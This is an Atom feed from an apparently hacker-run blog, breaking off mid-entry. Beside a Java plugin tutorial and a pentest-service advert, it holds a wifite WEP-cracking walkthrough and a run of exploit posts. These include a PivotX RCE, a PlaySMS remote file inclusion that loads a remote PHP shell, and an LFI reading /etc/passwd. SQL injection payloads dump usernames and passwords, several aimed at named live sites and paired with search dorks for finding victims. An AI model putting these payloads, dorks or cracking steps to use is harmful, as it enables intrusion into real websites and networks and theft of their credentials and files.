<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8067811077743031893</id><updated>2012-01-28T00:03:13.721+07:00</updated><category term='linux'/><category term='mixed'/><category term='vulnerabilities'/><category term='tutorial'/><title type='text'>NoGe.ZoNe</title><subtitle type='html'>Intelligence plus character that is the goal of true education [ Dr. Martin Luther King Jr. ]</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default?start-index=101&amp;max-results=100'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>184</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1560096696720636363</id><published>2011-12-01T10:40:00.006+07:00</published><updated>2011-12-01T12:32:17.423+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>How To Enable Java Plugin on Firefox 8.0 in Ubuntu 10.04</title><content type='html'>Install Java Plugin&lt;br /&gt;&lt;br /&gt;Download Java Runtime Environment for linux&lt;br /&gt;http://www.java.com/en/download/linux_manual.jsp?locale=en&lt;br /&gt;Choose Linux (self-extracting file)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-oXW7q_iNaO8/Ttb3oZfzvGI/AAAAAAAAAIk/BQjnm7xZmK8/s1600/jv1.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 111px;" src="http://1.bp.blogspot.com/-oXW7q_iNaO8/Ttb3oZfzvGI/AAAAAAAAAIk/BQjnm7xZmK8/s320/jv1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5681000253385587810" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Make folder java folder in /usr&lt;br /&gt;root@evilc0de:/home/noge# cd /usr&lt;br /&gt;root@evilc0de:/usr# mkdir java&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;copy jre-6u29-linux-i586.bin to /usr/java and extract it&lt;br /&gt;root@evilc0de:/usr/java# ./jre-6u29-linux-i586.bin&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-x3gcpVA9oiE/TtcQSp97hLI/AAAAAAAAAJI/nWlAs67kvnI/s1600/jv2.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 51px;" src="http://3.bp.blogspot.com/-x3gcpVA9oiE/TtcQSp97hLI/AAAAAAAAAJI/nWlAs67kvnI/s320/jv2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5681027367640466610" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enable Java on Firefox&lt;br /&gt;&lt;br /&gt;Go to /home/your_user/.mozilla&lt;br /&gt;root@evilc0de:/usr/java# cd /home/noge/.mozilla&lt;br /&gt;&lt;br /&gt;Make plugins directory&lt;br /&gt;root@evilc0de:/home/noge/.mozilla# mkdir plugins&lt;br /&gt;root@evilc0de:/home/noge/.mozilla# cd plugins&lt;br /&gt;&lt;br /&gt;Make symbolic link to java plugin&lt;br /&gt;root@evilc0de:/home/noge/.mozilla/plugins# ln -s /usr/java/jre1.6.0_29/lib/i386/libnpjp2.so&lt;br /&gt;&lt;br /&gt;Open firefox type about:plugins on address bar and enter&lt;br /&gt;You will see java plugin is enabled [Java(TM) Plug-in 1.6.0_29]&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-wqGvKPfvSqo/TtcRDa55arI/AAAAAAAAAJU/ogi2cM9YQ_o/s1600/java3.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://4.bp.blogspot.com/-wqGvKPfvSqo/TtcRDa55arI/AAAAAAAAAJU/ogi2cM9YQ_o/s320/java3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5681028205410609842" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I hope this article usefull for who can't enable java plugin on firefox&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1560096696720636363?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1560096696720636363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1560096696720636363' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1560096696720636363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1560096696720636363'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/12/how-to-enable-java-plugin-on-firefox-80.html' title='How To Enable Java Plugin on Firefox 8.0 in Ubuntu 10.04'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-oXW7q_iNaO8/Ttb3oZfzvGI/AAAAAAAAAIk/BQjnm7xZmK8/s72-c/jv1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3644433584340381172</id><published>2011-11-13T17:46:00.018+07:00</published><updated>2011-11-13T18:36:14.550+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>wifite &lt;= another wifi cracking tool</title><content type='html'>this tool is design for backtrack4 so if you using another linux distro you need to install aircrack-ng first&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;lets get started&lt;br /&gt;set your interface to monitor mode&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-FVnXIhWmUxc/Tr-jJojsHwI/AAAAAAAAAHc/_DGgf2MDsSI/s1600/5.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 106px;" src="http://4.bp.blogspot.com/-FVnXIhWmUxc/Tr-jJojsHwI/AAAAAAAAAHc/_DGgf2MDsSI/s320/5.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5674433441411374850" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;run wifite&lt;br /&gt;&lt;br /&gt;# python wifite.py&lt;br /&gt;&lt;br /&gt;wifite will automatically detect available access point and client also your interface&lt;br /&gt;press CTRL+C when you ready to attack&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-z3Y9sPN7zUc/Tr-j83drx0I/AAAAAAAAAHo/HnpZuLxDsUQ/s1600/1.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 110px;" src="http://4.bp.blogspot.com/-z3Y9sPN7zUc/Tr-j83drx0I/AAAAAAAAAHo/HnpZuLxDsUQ/s320/1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5674434321586046786" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;you will see all access point in your range&lt;br /&gt;i just have 3 access point :(&lt;br /&gt;now you can select which access point do you want to attack&lt;br /&gt;if you want attack all access point in your range just type "all" and enter&lt;br /&gt;in my case i will attack access point number 2 so i type "2" and enter&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-dzgDJ8dYXMI/Tr-mXCBJruI/AAAAAAAAAH0/FcIH7d0AjHI/s1600/2.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 118px;" src="http://3.bp.blogspot.com/-dzgDJ8dYXMI/Tr-mXCBJruI/AAAAAAAAAH0/FcIH7d0AjHI/s320/2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5674436970119016162" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;fake authentication successfull but my 2 attack not success :(&lt;br /&gt;arp replay attack timeout and chop chop attack failed&lt;br /&gt;wifite will automatically use another attack method like fragmentation attack&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-gLbif8Pgfcs/Tr-n8pmeKII/AAAAAAAAAIA/0S0-G4K50bE/s1600/3.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 86px;" src="http://2.bp.blogspot.com/-gLbif8Pgfcs/Tr-n8pmeKII/AAAAAAAAAIA/0S0-G4K50bE/s320/3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5674438715911317634" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;fragmentation attack require packetforge-ng to build keystream&lt;br /&gt;if the capture packet is enough, wifite will automatically crack for a key&lt;br /&gt;walla.. key found!! :))&lt;br /&gt;&lt;br /&gt;now i can connect to access point&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-NtZF2bkHNdg/Tr-o1SKUHiI/AAAAAAAAAIM/P1QALUiOoCQ/s1600/4.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 318px; height: 67px;" src="http://3.bp.blogspot.com/-NtZF2bkHNdg/Tr-o1SKUHiI/AAAAAAAAAIM/P1QALUiOoCQ/s320/4.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5674439688871747106" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;download &lt;a href="http://code.google.com/p/wifite/"&gt;wifite&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;download &lt;a href="http://download.aircrack-ng.org/"&gt;aircrack-ng&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;use this command to view help&lt;br /&gt;&lt;br /&gt;# python wifite.py -h&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3644433584340381172?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3644433584340381172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3644433584340381172' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3644433584340381172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3644433584340381172'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/11/wifite-another-wifi-cracking-tool.html' title='wifite &lt;= another wifi cracking tool'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-FVnXIhWmUxc/Tr-jJojsHwI/AAAAAAAAAHc/_DGgf2MDsSI/s72-c/5.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2181374936663855127</id><published>2011-10-15T20:24:00.001+07:00</published><updated>2011-10-15T20:28:25.188+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Pivotx TimThumb Remote Code Execution Vuln</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] PivotX &lt;= Remote Code Execution Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : PivotX ver 2.2.6&lt;br /&gt;Vendor : http://pivotx.net/&lt;br /&gt;Original Author : MaXe [ http://www.exploit-db.com/exploits/17602/ ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;pivotx/includes/timthumb.php&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/pivotx/includes/timthumb.php?src=[RCE]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Fix&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Upgrade to new version (2.3.0)&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2181374936663855127?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2181374936663855127/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2181374936663855127' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2181374936663855127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2181374936663855127'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/10/pivotx-timthumb-remote-code-execution.html' title='Pivotx TimThumb Remote Code Execution Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6019929429151266785</id><published>2011-09-24T20:57:00.003+07:00</published><updated>2011-09-24T22:37:09.519+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>Pentest Service [ Web Applications and Web Server ]</title><content type='html'>hi folks..&lt;br /&gt;&lt;br /&gt;i'm start to open penetration tester service for web application and web server.&lt;br /&gt;why penetration tester? because security is very important things in a cyber world.&lt;br /&gt;you don't wanna wake up in the morning and find out someone already steal your sensitive information from your database right? that's why i'm here to prevent things like that happen.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;contact me for more details.. noge[dot]code[at]gmail[dot]com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6019929429151266785?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6019929429151266785/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6019929429151266785' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6019929429151266785'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6019929429151266785'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/09/pentest-service-web-applications-and.html' title='Pentest Service [ Web Applications and Web Server ]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-924297972321507839</id><published>2011-09-06T20:46:00.005+07:00</published><updated>2011-09-06T20:52:59.105+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>PlaySMS Remote File Inclusion Vulnerability</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] PlaySMS &lt;= Remote File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : PlaySMS ver 0.9.5.2&lt;br /&gt;Vendor : http://playsms.org/&lt;br /&gt;Author : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;affected all this files&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;web/plugin/themes/default/page_forgot.php&lt;br /&gt;web/plugin/themes/default/page_login.php&lt;br /&gt;web/plugin/themes/default/page_noaccess.php&lt;br /&gt;web/plugin/themes/default/page_register.php&lt;br /&gt;web/plugin/themes/km2/page_noaccess.php&lt;br /&gt;web/plugin/themes/work2/page_forgot.php&lt;br /&gt;web/plugin/themes/work2/page_login.php&lt;br /&gt;web/plugin/themes/work2/page_noaccess.php&lt;br /&gt;web/plugin/themes/work2/page_register.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-924297972321507839?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/924297972321507839/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=924297972321507839' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/924297972321507839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/924297972321507839'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/09/playsms-remote-file-inclusion.html' title='PlaySMS Remote File Inclusion Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-141432265027393903</id><published>2011-08-17T17:14:00.002+07:00</published><updated>2011-08-17T17:20:17.381+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>JoomTouch Joomla Component &lt;= LFI Vuln</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] JoomTouch Joomla Component &lt;= Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : com_joomtouch ver 1.0.2&lt;br /&gt;Vendor : http://www.joomtouch.com/&lt;br /&gt;Dork : "com_joomtouch"&lt;br /&gt;Author : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_joomtouch&amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://torah5.com/index.php?option=com_joomtouch&amp;controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;http://www.shivamtranscon.com/index.php?option=com_joomtouch&amp;controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;DIRGAHAYU INDONESIAKU... MERDEKA!!!&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-141432265027393903?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/141432265027393903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=141432265027393903' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/141432265027393903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/141432265027393903'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/08/joomtouch-joomla-component-lfi-vuln.html' title='JoomTouch Joomla Component &lt;= LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-14907456451618984</id><published>2011-08-09T20:15:00.002+07:00</published><updated>2011-08-09T20:20:33.763+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>TNR Enhanced Joomla Search SQL Injection Vulnerability</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] TNR Enhanced Joomla Search SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : com_esearch ver 3.0.0&lt;br /&gt;Vendor : http://www.tnrjoomla.com/&lt;br /&gt;Dork : "com_esearch"&lt;br /&gt;Author : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/index.php?search=NoGe&amp;option=com_esearch&amp;searchId=[SQLi]&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://www.visitdetroit.com/index.php?search=NoGe&amp;option=com_esearch&amp;searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--&lt;br /&gt;http://www.tnrjoomla.com/index.php?search=NoGe&amp;option=com_esearch&amp;searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-14907456451618984?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/14907456451618984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=14907456451618984' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/14907456451618984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/14907456451618984'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/08/tnr-enhanced-joomla-search-sql.html' title='TNR Enhanced Joomla Search SQL Injection Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2426131207835622289</id><published>2011-07-17T11:07:00.008+07:00</published><updated>2011-07-18T10:46:30.706+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Blue Utopia CMS SQLi Vulnerability</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] Blue Utopia CMS SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : Blue Utopia CMS&lt;br /&gt;Vendor : http://blueutopia.com/&lt;br /&gt;Dork : "Powered by Blue Utopia"&lt;br /&gt;Author : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/index.php?page=news&amp;full=[SQLi}&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://www.geaugadems.org/index.php?page=news&amp;full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--&lt;br /&gt;http://buetowforschoolboard.com/index.php?page=news&amp;full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;[o] Note&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;this is a private script&lt;br /&gt;all in one server&lt;br /&gt;vendor already notified&lt;br /&gt;bug has been fixed by vendor! :))&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2426131207835622289?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2426131207835622289/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2426131207835622289' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2426131207835622289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2426131207835622289'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2011/07/blue-utopia-cms-sqli-vulnerability.html' title='Blue Utopia CMS SQLi Vulnerability'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7787938048061276732</id><published>2011-07-16T22:55:00.007+07:00</published><updated>2011-07-22T13:52:00.812+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>MyNews Arbitrary File Upload Vuln</title><content type='html'>&lt;span style="font-weight:bold;"&gt;[o] MyNews Arbitrary File Upload Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : MyNews 1.6.5&lt;br /&gt;Vendor : http://www.planetluc.com/&lt;br /&gt;Dork : "Powered by MyNews"&lt;br /&gt;Author : 